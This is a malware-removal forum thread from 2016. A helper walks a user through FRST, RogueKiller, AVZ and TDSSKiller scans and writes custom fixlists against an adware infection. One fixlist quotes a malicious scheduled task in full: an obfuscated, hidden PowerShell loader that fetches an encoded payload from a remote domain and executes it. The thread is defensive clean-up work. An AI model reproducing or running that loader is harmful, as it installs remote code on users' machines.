NT\CurrentVersion\Schedule\TaskCache\Tasks\{EFC17773-F9EA-461F-AFF9-5D48AC85435C}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F07B4757-5DE7-4127-93F2-5840B62D68F0} => key not found. C:\WINDOWS\System32\Tasks\VJBJMDRJBRJCQACG => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\VJBJMDRJBRJCQACG => key not found. C:\WINDOWS\Tasks\NPSEYLEPFCUWGUQR.job => not found. C:\WINDOWS\Tasks\VJBJMDRJBRJCQACG.job => not found. HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => value restored successfully Oseozg => service removed successfully pclient => service removed successfully Sorkicgo => service removed successfully SynTPEnhService => service removed successfully Update Checked List => service not found. Update Simple for You => service removed successfully Util Great Hub => service not found. WajaNetEn Monitor => service not found. wucotusy => service not found. xycewozozbt => service not found. zutuzuni => service not found. swsedrvr_vw_1_10_0_25 => service not found. {0ae6a885-0fb1-4244-a055-126ed790cca7}Gw64 => service not found. {29ceb117-5e62-490b-8e5d-97f7ec432220}Gw64 => service not found. {2a6b0fdc-8815-4aa5-a061-069d6db3f642}Gw64 => service not found. {f0d54446-7cd7-458a-8a86-e54cb3c15f3d}Gw64 => service not found. C:\ProgramData\08fec31f-6735-1 => moved successfully "C:\WINDOWS\System32\Tasks\Run_Bobby_Browser" => not found. "C:\Users\Albert\AppData\Local\BoBrowser" => not found. C:\Users\Albert\AppData\Roaming\PefdFabebak => moved successfully "C:\WINDOWS\System32\Tasks\{7A040847-0B7A-0A7E-0C11-0F790B7D110B}" => not found. "C:\Program Files (x86)\Pro PC Cleaner" => not found. C:\WINDOWS\system32\sin => moved successfully C:\WINDOWS\system32\oce => moved successfully C:\WINDOWS\system32\luek => moved successfully C:\WINDOWS\system32\pao => moved successfully C:\WINDOWS\system32\biv => moved successfully C:\WINDOWS\system32\eou => moved successfully ==== End of Fixlog 10:27:00 ==== Link to post Share on other sites
Kevin Zoll 309 Posted February 19, 2016 Report Share Posted February 19, 2016 All logs are to be attached. Do not copy and paste any logs to your replies, unless specifically told to do so. Let's take a fresh look. Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply. Be sure to let me know how things are running? Link to post Share on other sites
ajdebenedictis 0 Posted February 19, 2016 Author Report Share Posted February 19, 2016 Hi Kevin Zoll, Thank you for your quick reply. I apologize for copying and pasting the report contents in my previous post. I could not find a way to attach them. I now realize I needed to log in to be able to attach files. I just re-ran the Emsisoft Emergency Kit (EEK) and the Farbar Recovery Scan Tool (FRST) programs. The Scan_160219-164010.txt file is the report from the EEK program, The FRST.txt and the Addition.txt files are from the FRST program. I started my Microsoft Edge web browser after I ran the anti-Malware programs. So far I do not see any Adware or pop-ups. I do not want to speak too soon, as sometimes the malware does not appear right away. Please review the reports I attached to this memo. Thank you very much. I greatly appreciate your assistance. Albert DeBenedictis Addition.txt FRST.txt scan_160219-164010.txt Link to post Share on other sites
ajdebenedictis 0 Posted February 19, 2016 Author Report Share Posted February 19, 2016 Hi Kevin Zoll, I just checked the infected computer and Malware continues to appear in my web browser. Sometimes a pop-up appears on the right side of the screen and other times new tabs are automatically created, along with pop-up messages indicating that I have a virus. Most of the added tabs are advertisements. The browser quickly jams up from all the new tabs and pop-ups being created and becomes unusable. Sometimes I am able to close the added unwanted tabs and sometimes I am not. I am usually able to close the browser. Previously, after the web browser would become jammed up, the entire screen would turn gray and I would not be able to do anything on my computer. I would have to hold down the power button until the computer shut down in order to get rid of the problem, only to have to problem reappear shortly after I opened a web browser again. After you review the reports I sent you a little while ago, please let me know what I need to do next to get rid of the Malware problem. Thanks. Al DeBenedictis Link to post Share on other sites
Kevin Zoll 309 Posted February 22, 2016 Report Share Posted February 22, 2016 Al, Do the following: Copy the below code to Notepad; Save As fixlist.txt to your Desktop. (Time Lapse Solutions) C:\ProgramData\QreiaUdrwr\wxHYmUj.exe HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => No File FF NewTab: C:\\ProgramData\\Zoobams\\ff.NT FF Homepage: C:\\ProgramData\\Zoobams\\ff.HP FF HKLM\...\Firefox\Extensions: [{DCC468B9-5708-470B-aD60-F0F1B74AE684}] - C:\Program Files\shopperz150120160349\Firefox\{DCC468B9-5708-470B-aD60-F0F1B74AE684}.xpi => not found FF HKLM-x32\...\Firefox\Extensions: [{DCC468B9-5708-470B-aD60-F0F1B74AE684}] - C:\Program Files\shopperz150120160349\Firefox\{DCC468B9-5708-470B-aD60-F0F1B74AE684}.xpi => not found R2 wxHYmUj; C:\ProgramData\QreiaUdrwr\wxHYmUj.exe [3001832 2016-02-19] (Time Lapse Solutions) R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-01-14] () 2016-02-19 15:27 - 2016-02-19 15:27 - 00023044 _____ C:\WINDOWS\System32\Tasks\{7A047D47-7E08-7A7A-0A11-7E0A0E79110D} 2016-02-19 09:27 - 2016-02-19 09:27 - 00000000 ____D C:\ProgramData\7e2b8235-63c7-0 2016-02-19 09:23 - 2016-02-19 11:54 - 00000000 ____D C:\ProgramData\QreiaUdrwr 2016-02-19 09:22 - 2016-02-19 09:22 - 00003882 _____ C:\WINDOWS\System32\Tasks\{A8F4BFF6-B62E-1C5D-3582-2B7E14128F3F} 2016-02-19 09:22 - 2016-02-19 09:22 - 00000000 ____D C:\ProgramData\7e2b8235-1df5-0 2016-02-19 09:22 - 2016-02-19 09:22 - 00000000 ____D C:\ProgramData\3c8743d3 2016-02-19 09:22 - 2016-01-14 18:48 - 00000000 ____D C:\ProgramData\7222c77a-63b1-0 2016-02-19 09:22 - 2016-01-14 18:48 - 00000000 ____D C:\ProgramData\7222c77a-0105-1 C:\WINDOWS\System32\Drivers\bsdriver.sys C:\Program Files (x86)\Microsoft.NET\v2.0.507237\msnetcore.exe C:\ProgramData\QreiaUdrwr\wxHYmUj.ex C:\ProgramData\QreiaUdrwr\dat\zEyubVki.exe C:\ProgramData\QreiaUdrwr\dat\bqUmhdn.exe C:\ProgramData\QreiaUdrwr\dat\ukVqwoH.dll C:\ProgramData\QreiaUdrwr\dat\KUoAScdsj.dll C:\ProgramData\QreiaUdrwr\wxHYmUj.exe C:\Users\Albert\AppData\Local\Temp\hib2A95.exe C:\Users\Albert\AppData\Local\Temp\hib4883.exe C:\ProgramData\QreiaUdrwr\dat C:\ProgramData\QreiaUdrwr C:\PROGRA~3\3c8743d3\d939fbf.dll C:\PROGRA~3\3c8743d3 Task: {DDDE65B1-EC6E-4C89-8C3D-88D97C3AA1C7} - System32\Tasks\{7A047D47-7E08-7A7A-0A11-7E0A0E79110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand     ;   ;   ; ;   ;       ;     ;     ;   ; ; ;     ; $ E r r o r A c t i o n P r e f e r e n c e = " s t o p " ; $ s c = " S i l e n t l y C o n t i n u e " ; $ W a r n i n g P r e f e r e n c e = $ s c ; $ P r o g r e s s P r e f e r e n c e = $ s c ; $ V e r b o s e P r e f e r e n c e = $ s c ; $ D e b u g P r e f e r e n c e = $ s c ; 
 f u n c t i o n   F T L Z Y P I Z X I J A ( $ p ) { $ n = " W i n d o w P o s i t i o n " ; t r y { N e w - I t e m   - P a t h   $ p | O u t - N u l l ; } c a t c h { } t r y { N e w - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - P r o p e r t y T y p e   D W O R D   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ;   } 
 c a t c h { t r y { S e t - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } c a t c h { }   } } F T L Z Y P I Z X I J A ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ W i n d o w s P o w e r S h e l l _ v 1 . 0 _ p o w e r s h e l l . e x e " ) ; F T L Z Y P I Z X I J A ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ s v c h o s t . e x e " ) ; F T L Z Y P I Z X I J A ( " H K C U : \ C o n s o l e \ t a s k e n g . e x e " ) ; 
 $ s u r l = " h t t p : / / f l i p a r r a y . i n f o / u / ? a = U 9 7 9 G 7 - Z X p B h 8 q g a m T 1 X p s Y W t Z Y w v r W V c i j j k W N Q s F M I i L I b m x w J h _ 1 k j B a N N n t 4 a P r g p H g 7 R 9 Z D - m M E G - h L t 0 n X p q D - - Y J z C B o H p j l X x V h 1 C Y 7 _ L x Y h n C v 5 3 z H U Y m F r 0 E P 9 - Y j V 2 L f t q s Z y L X 0 X X C 9 g U d a o Y 0 O f k F X M o d B r q i x O k l 9 j v M 8 M C X g h F 5 G g j h O 5 W u S 7 v A 7 M 5 b A i O p M 2 9 R j z a z 3 y s e 3 a 5 p L 5 4 G h D u X O M g x Z x W y z s J l _ C 2 d P L r _ N U G A T X t 5 f 6 g j u 4 q n l y 6 8 g o O t I t 5 a Z J 9 D s W E 6 L R v X U O J f w p Z h C p o F A p c 5 0 i 6 R y 1 V H H y L X 5 Y 2 V W O i U - _ d j U S v F B n r w l r b i h - x O g v k e w 6 C q 6 - I 6 O x G w I 9 j 2 2 Q m N m V H X _ U z z N X V 0 r B E W D V 2 x H O 8 W z E m S w y 8 j z a J h B s 3 E F S Z Q c 8 Y m e v e M F t n i T W K q i 3 Z a L l 8 8 L w l b w C H B Y i 0 m J K H t h J j y M Q x 1 B R z M d 4 x u i 6 i k b s R m d g q R M 3 w Q 4 d N 6 n H _ 0 Q n 2 4 0 r y X z z 0 o J A a S u 6 Y 8 P l A g d v C X 1 x Q k P b X Q b t Y M M O s x Q k T Y o T 4 M g Q t H A D y r X 5 x k B g C J v c 5 l k i M M 0 q p S g k o a N 5 t S K v o 0 I K a o 2 8 g h C 5 8 O t b V e b Z x n 2 - W 0 B l a m p E s o Z Y j 5 a c I 3 T E P H A 8 v I m d f c c S J z P _ I b s o b - - 0 n y 4 v l _ 9 K C S p 8 G W L K b x S l F s J L 6 L C p V 5 V J H P T O x S 5 h g F s Q - D 1 b 3 4 F 1 K e f V L O t F 2 s N W E t e 5 B v N a C 6 P q n F w C E 5 3 q y 8 L _ 7 - P r 2 0 _ q r Z g c T H I l c 3 n 9 h n T n n D 7 F z n N 8 7 n m n w U J g F 4 m f A Y g a N U 5 H T B D B P u K o X z A q T N a 0 r K i E V U y h 7 q z _ S p _ L U 4 L P S j W t z & c = B G Q O T y V 7 3 x j A _ l - q R V d g a m T U X r f m W A Y c N h x f I m L a F T L Z Y P I Z X I J A b N n g h S 3 7 M 3 B j R 5 G c h s _ 4 i u o F T I u b X h S Q v 1 Q p k z A Q 7 U A N B y a 5 r x F D a w l R v Q 3 R d C J k c s c T 8 C 7 E p W I 2 k t o e a I A Y t v T P D F 5 8 W y l x 4 x y p P j Z O q c X j Y P N p 8 L k M C R L w L 4 X V B N P C 9 y d c M t I I 4 H D 1 Q E y j C H h D 1 F A m J f H Y N R t o 0 8 U 3 R l B P G _ F 7 w z m t L N u q 7 x M Z H O D V c t Y N z 7 O g c 8 i O r s o q z 8 O 4 i 1 F 2 s c W 9 v - g K M J 6 O q r y P _ J N 4 o 1 6 d 7 k T 5 6 G 2 z N f G y m l 6 D v o v f w T E b r R F _ 4 p _ E h H T B D B Z M j 3 N w _ j N _ m Z 8 b 5 g r 1 Z H F j 0 e G C X U A u l 6 k j E M X P b e T 3 8 h E i y I z B c w Z 6 l p b f 0 9 v v u I r k n a D g H r U U f c 2 p 9 m Z d l x K 6 a S w C l 9 3 j s _ l h n n Q Z C j H f P d U k r B 4 C h y R W I O - 2 w C v l t g J d q b M L - F g g k l y N F M a s e m u w l R u 4 1 c H n r W 6 O A n i 5 N b J c N 9 H p o E b g j h 9 0 Q h F 2 k 7 Y 7 q w y y z Y N K o b 7 B Y f g F J R y b g L T t M L q V r 3 R 3 9 E 7 8 n g Q S w r r M 0 F 6 K a S b G r k H w 2 u q q B C w M m q T U 1 z i 4 3 P 6 6 s K v I _ h o e Z h x o L I j l U Z C 3 f a U D X u j 6 a J W E N i h 3 3 J a V V u z F A p 5 M 0 g d c 1 N L z P 0 - L j - _ 0 h E j S h l 4 N R E z o o b i f M R j Q i T G r s X u 6 l w K P D A 7 w t F S 2 d _ 6 F M m y 3 S N n H G g v i V t S 7 N K L U O 9 y m P D T s D t O X u W u p X s p Z 0 1 G x f i B D N y p e L f _ E s 6 n h 6 c D - K 1 f m K q g d - P w G m q m m X d z 9 c n 3 J C 2 X B F H r f g O - - l k p Z y 4 P M x - H m B D V a Y 2 x 2 X 0 h 2 l e t 7 I t g 2 Y U I _ J s U 7 0 9 w t 3 T v Q j g Y v v d - A & r = 5 3 4 9 0 4 7 3 6 4 4 8 9 6 9 5 0 1 " ; $ s t s k = " { 7 A 0 4 7 D 4 7 - 7 E 0 8 - 7 A 7 A - 0 A 1 1 - 7 E 0 A 0 E 7 9 1 1 0 D 
 } " ; $ p r i d = " f l o a t i n g " ; $ i n i d = " O T P G P Q K R " ; t r y { i f ( $ P S V e r s i o n T a b l e . P S V e r s i o n . M a j o r   - l t   2 ) { b r e a k ; } $ v = [ S y s t e m . E n v i r o n m e n t ] : : O S V e r s i o n . V e r s i o n ; 
 i f ( $ v . M a j o r   - e q   5 ) { i f ( ( $ v . M i n o r   - l t   2 )   - A N D   ( ( G e t - W m i O b j e c t   W i n 3 2 _ O p e r a t i n g S y s t e m ) . S e r v i c e P a c k M a j o r V e r s i o n   - l t   2 ) ) { b r e a k ; ; } 
 } 
 i f ( - N O T   ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l ] [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) ) . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t I n R o l e ]   " A d m i n i s t r a t o r " ) ) { b r e a k ; } 
 f u n c t i o n   H T B D B ( $ u r l ) { $ r q = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ r q . U s e D e f a u l t C r e d e n t i a l s = $ t r u e ; $ r q . H e a d e r s . A d d ( " u s e r - a g e n t " , " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ; ) " ) ; r e t u r n   [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( $ r q . D o w n l o a d D a t a ( $ u r l ) ) ; } 
 f u n c t i o n   X C U T G C _ Y O A M I C ( $ r a w d a t a ) { $ b t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r a w d a t a ) ; $ e x t = $ b t [ 0 ] ; $ k e y = $ b t [ 1 ]   - b x o r   1 7 0 ; f o r ( $ i = 2 ; $ i   - l t   $ b t . L e n g t h ; $ i + + ) { $ b t [ $ i ] = ( $ b t [ $ i ]   - b x o r   ( ( $ k e y   +   $ i )   - b a n d   2 5 5 ) ) ; 
 } 
 r e t u r n ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . D e f l a t e S t r e a m ( ( N e w - O b j e c t   I O . M e m o r y S t r e a m ( $ b t , 2 , ( $ b t . L e n g t h - $ e x t ) ) ) , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; } 
 $ s c = X C U T G C _ Y O A M I C ( H T B D B ( $ s u r l ) ) ; I n v o k e - E x p r e s s i o n   - c o m m a n d   " $ s c " ; } c a t c h { 
 } ; e x i t   0 ;  Task: {E5C852B3-9C57-4877-BC8C-24193156517B} - System32\Tasks\{A8F4BFF6-B62E-1C5D-3582-2B7E14128F3F} => /s /n /i:"/rt" "C:\PROGRA~3\3c8743d3\d939fbf.dll"Close Notepad.NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST64 and press the Fix button just once and wait. If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply. Note: If the tool warns you about an outdated version please download and run the updated version. Link to post Share on other sites
ajdebenedictis 0 Posted February 23, 2016 Author Report Share Posted February 23, 2016 Hi Kevin Zoll, Thank you for your reply. I copied the text you provided yesterday (2/22/2016) and created a new fixlist.txt file. I re-ran the FRST anti-malware program, which generated a Fixlog.txt file. I attached the file for you to review. I noticed the bsdriver.sys (located in C:/Windows\System32\Drivers) was not able to be removed by the program. I tried to delete it manually, however, I am not able to do so, as the error message states the I need Administrative permission. Please review the attached fixlog.txt file generated by the FRST program and let me know what I need to do next. I greatly appreciate your help. Albert DeBenedictis Fixlog.txt Link to post Share on other sites
Kevin Zoll 309 Posted February 23, 2016 Report Share Posted February 23, 2016 Changing tools. Download RogueKiller from one of the following links and save it to your desktop: Link 1 Link 2Close all programs and disconnect any USB or external drives before running the tool. Double-click RogueKiller.exe to run the tool (Vista/7/8/10 users: Right-click and select Run As Administrator). Once the Prescan has finished, click Scan. Once the Status box shows "Scan Finished", just close the program. <--Don't fix anything! Attach the RogueKiller report to your next reply.The log can also be found on your desktop labeled (RKreport[X]_S_xxdatexx_xtimex) The highest number of [X], is the most recent can Link to post Share on other sites
ajdebenedictis 0 Posted February 24, 2016 Author Report Share Posted February 24, 2016 Hi Kevin Zoll, Thank you for the new instructions. I downloaded the RogueKiller program you mentioned in you 2/23/2016 instructions and ran the program on the infected computer. When I attempted to attach the report (RKreport_SCN_02242016_094757.json) to this post I received the error message "you aren't permitted to upload this kind of file," I changed the extension to .txt and re-attached it. I do not believe this is the report you want. I went back into the infected computer and clicked the report button and created a different report. I will attach this report to a separate post, as I am not able to attach it to this post. Sorry for the confusion. Please check this report and let me know what I need to do next. Thanks again for your help. I really appreciate it. Albert DeBenedictis RKreport_SCN_02242016_094757.txt Link to post Share on other sites
ajdebenedictis 0 Posted February 24, 2016 Author Report Share Posted February 24, 2016 Hi Kevin Zoll, I downloaded the RogueKiller program you mentioned in your last instructions and ran it on the infected computer. (I ran the program from a folder in Windows Explorer rather than from the desktop. In the future I will copy the program in Windows Explorer and paste it to my desktop. I am not familiar with using the desktop.) After the program completed, I clicked on the Export button, which allowed me to name the report (RogueKiller Report 2016-02-24.txt). I attached the report to this post for you to review. I also attached the RKreport_SCN_02242016_094757.json report (renamed RKreport_SCN_02242016_094757.txt so I could attach it). After this, I clicked on the Delete button, which hopefully deleted the malware (the bsdriver.sys still remains). Once the process completed, the computer re-started. After you review the reports, please let me know what I need to do next. Thank you so much for your help. Albert DeBenedictis RKreport_SCN_02242016_094757.txt RogueKiller Report 2016-02-24.txt Link to post Share on other sites
Kevin Zoll 309 Posted February 25, 2016 Report Share Posted February 25, 2016 Close all programs and disconnect any USB or external drives before running the tool. Double-click RogueKiller.exe to run the tool again (Vista/7/8/10 users: Right-click and select Run As Administrator)[/i]. Once the Prescan has finished, click Scan. Once the Status box shows "Scan Finished".Click the Processes Tab and select the following items:[PUP|VT.PUP.Optional.Cherimoya] (SVC) bsdriver -- \??\C:\WINDOWS\system32\drivers\bsdriver.sys[7] -> ERROR [41c] Click the Registry Tab and select the following items:[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Partner -> Found [VT.PUP.Optional.PlayThruPlayer] (X64) HKEY_USERS\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run | Playthru Player : "C:\Program Files (x86)\PlaythruPlayer\PlaythruPlayer.exe" /autostart=1 [7][x] -> Found [Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run | Dynamation : C:\Users\Albert\AppData\Local\Dynamation\Dynamation.exe [x] -> Found [Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run | Winoneexe : C:\Users\Albert\AppData\Local\winone\WinoneApp.exe [x] -> Found [VT.PUP.Optional.PlayThruPlayer] (X86) HKEY_USERS\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run | Playthru Player : "C:\Program Files (x86)\PlaythruPlayer\PlaythruPlayer.exe" /autostart=1 [7][x] -> Found [Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run | Dynamation : C:\Users\Albert\AppData\Local\Dynamation\Dynamation.exe [x] -> Found [Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run | Winoneexe : C:\Users\Albert\AppData\Local\winone\WinoneApp.exe [x] -> Found [PUP] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bsdriver -> Found [PUP] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\bsdriver -> Found [PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found [PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found Click the Tasks Tab and select the following items:[Suspicious.Path] \Muueguehnlaek -- "C:\ProgramData\Muueguehnlaek\1.0.7.1\ibownaoe.exe" ("/e=L3A9MTg3NDAxXi91PTdiMTQ1NDg3YzE3ZjQ3MzI5ODY2OTQ3Y2I4ZTA1MTA3Xi9kPXpvbWJpZW5ld3NhcHAuY29tXi9uPVpNQk5eL2E9Wm9tYmllTmV3c14vdA==") -> Found Click the Files Tab and select the following items:[PUP][File] C:\Windows\System32\drivers\bsdriver.sys -> Found [PUP][File] C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\speed browser XXXzzzXXX.lnk [[email protected]] C:\Program Files (x86)\speed browser\Application\browser.exe -> Found [PUP][Folder] C:\ProgramData\{C19CA186-4F06-4E22-A1E6-6BAB4723A0DE} -> Found Click the Delete button. Attach the RogueKiller report to your next reply.The log can also be found on your desktop labeled (RKreport[X]_D_xxdatexx_xtimex) The highest number of [X], is the most recent Delete Link to post Share on other sites
ajdebenedictis 0 Posted February 26, 2016 Author Report Share Posted February 26, 2016 Hi Kevin Zoll, I followed your instructions. I was not able to delete the file bsdriver.sys located in C:\Windows\system32\drivers via RogueKiller. I attached a screen shot that shows I was not able to select or delete this file in the RogueKiller program. I attached the 2 reports generated by RogueKiller after I re-ran the program. I re-named the extension for RKreport_DEL_02252016_192939.json to .txt. so that I may attach it to this post. Please let me know what you would like me to do next. I now realize I need to sign out and sign back in to see your latest post. Take care, Albert DeBenedictis rk_8E11-2016-02-25.txt RKreport_DEL_02252016_192939.txt Link to post Share on other sites
Kevin Zoll 309 Posted February 26, 2016 Report Share Posted February 26, 2016 Changing tools. Download avz4.zip from here Unzip it to your desktop to a folder named avz4 Double click on AVZ.exe to run it. Run an update by clicking the Auto Update button on the Right of the Log window: Click Start to begin the update Note: If you receive an error message, chose a different source, then click Start again After the update, from the "File" menu, choose "Standard Scripts" Put a check next to item 2: Advanced System Analysis Click Execute selected scripts At the next prompt, click the OK button Let the scan run and click "OK" when the completion prompt pops up Now Close out of the Standard Scripts window, and exit AVZ Navigate to the avz4 folder and locate the folder LOG Inside the LOG folder you will find virusinfo_syscheck.htm, virusinfo_syscheck.htm and virusinfo_syscheck.zip Attach the Compressed file, virusinfo_syscheck.zip, to your next reply. Link to post Share on other sites
ajdebenedictis 0 Posted February 27, 2016 Author Report Share Posted February 27, 2016 Hi Kevin Zoll, When I executed the AVZ Antiviral Toolkit I received an error message from Windows 10 after I selected the options you indicated in your post. I attached a screen print of the error message. The error message states: "AVZ has stopped working..." From looking at the log, it appears there were some problems with some Functions. Please check the log in the screen print and let me know what you would like me to do next. Thanks, Albert DeBenedictis Link to post Share on other sites
Kevin Zoll 309 Posted February 29, 2016 Report Share Posted February 29, 2016 Read carefully and follow these steps. Download TDSSKiller and save it to your Desktop. Double-click on TDSSKiller.exe to run the application. Click Change parameters Check the boxes next to Verify Driver Digital Signature and Detect TDLFS file system, then click OK Click on the Start Scan button to begin the scan and wait for it to finish.NOTE: Do not use the computer during the scan! During the scan it will look similar to the image below: When it finishes, you will either see a report that no threats were found like below:If no threats are found at this point, just click the Report selection on the top right of the form to generate a log. A log file report will pop which you can just close since the report file is already saved. If any infection or suspected items are found, you will see a window similar to below:If you have files that are shown to fail signature check do not take any action on these. Make sure you select Skip. I will tell you what to do with these later. They may not be issues at all. If Suspicious objects are detected, the default action will be Skip. Leave the default set to Skip. If Malicious objects are detected, they will show in the Scan results. TDSSKiller automatically selects an action (Cure or Delete) for malicious objects Make sure that Cure is selected. Important! - If Cure is not available, please choose Skip instead. Do not choose Delete unless instructed to do so. Click Continue to apply selected actions. A reboot may be required to complete disinfection. A window will appearReboot immediately if TDSSKiller states that one is needed. Whether an infection is found or not, a log file should have already been created on your C: drive (or whatever drive you boot from) in the root folder named something like TDSSKiller.2.1.1_27.12.2009_14.17.04_log.txt which is based on the program version # and date and time run. Attach this log to your next reply. Link to post Share on other sites
ajdebenedictis 0 Posted February 29, 2016 Author Report Share Posted February 29, 2016 Hi Kevin Zoll, I ran the TDSSKiller program you mentioned in your last post. The program did not find any threats on my computer. I attached the report for you to review. Please let me know what you would like me to do next. Thanks for your assistance. I really appreciate your help. Albert DeBenedictis TDSSKiller.3.1.0.9_29.02.2016_18.14.32_log.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 1, 2016 Report Share Posted March 1, 2016 OK, Let's start at the beginning again. Let's take a fresh look.Run fresh scans with Emsisoft Emergency Kit (EEK) and FRST, attach the new EEK and FRST scans to your reply.Be sure to let me know how things are running? Link to post Share on other sites
ajdebenedictis 0 Posted March 2, 2016 Author Report Share Posted March 2, 2016 Hi Kevin Zoll, I re-ran EEK (Emsisoft Emergency Kit) and FRST (Farbar Recovery Scan Tool), as you instructed, and attached the reports to this post. The "scan_160301-191624.txt" is the report from the EEK run and the reports "FRST_01-03-2016_19-34-16.txt" and "Addition_01-03-2016_19-34-16.txt" are from the FRST run. I haven't started any web browsers lately, as I got tired of having to stop tasks and uninstall unwanted programs. After I ran the EEK and FRST programs, I started Mozilla Firefox. I admit, it was a little unnerving and scary starting up a web browser. I will need to leave Mozilla Firefox and Windows Edge open for at least an hour or so to see if any malware, adware, popups, appear. I will let you know what happens after I have web browsers open for at least an hour. Please let me know what you would like me to do next. Thanks for your help. Al DeBenedictis scan_160301-191624.txt Addition_01-03-2016_19-34-16.txt FRST_01-03-2016_19-34-16.txt Link to post Share on other sites
Kevin Zoll 309 Posted March 2, 2016 Report Share Posted March 2, 2016 Do the following: Copy the below code to Notepad; Save As fixlist.txt to your Desktop. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [NowUSeeIt Player] => "C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe" /autostart=1 R1 bsdriver; C:\WINDOWS\system32\drivers\bsdriver.sys [34712 2016-01-14] () 2016-02-27 13:04 - 2016-02-27 13:04 - 00003882 _____ C:\WINDOWS\System32\Tasks\{A8F4BFF6-B62E-1C5D-3582-2B7E14128F3F} 2016-02-27 13:04 - 2016-02-27 13:04 - 00000000 ____D C:\ProgramData\3c8743d3 C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe C:\Program Files (x86)\NowUSeeItPlayer C:\WINDOWS\system32\drivers\bsdriver.sys C:\ProgramData\3c8743d3\d939fbf.dll C:\ProgramData\3c8743d3 C:\PROGRA~3\3c8743d3\d939fbf.dll C:\PROGRA~3\3c8743d3 Task: {48003186-36FE-4057-90D5-EE65CC144E75} - System32\Tasks\{A8F4BFF6-B62E-1C5D-3582-2B7E14128F3F} => /s /n /i:"/rt" "C:\PROGRA~3\3c8743d3\d939fbf.dll" Task: {9A4910BD-9D13-4532-9DA9-992A5988869B} - System32\Tasks\{250D40E0-5C13-45D0-A4D3-B0CD2A62E544} => pcalua.exe -a "C:\Program Files (x86)\SpaceSondPro\uninstall.exe" Task: {D871D0B9-19DB-4FF1-A32E-E10575EDD248} - System32\Tasks\{A95F6B31-6E7F-4427-A398-B9C18A6F5C21} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\GUPlayerUninstaller.exe"Close Notepad.NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work. NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system Run FRST64 and press the Fix button just once and wait. If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart. The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply. Note: If the tool warns you about an outdated version please download and run the updated version. Link to post Share on 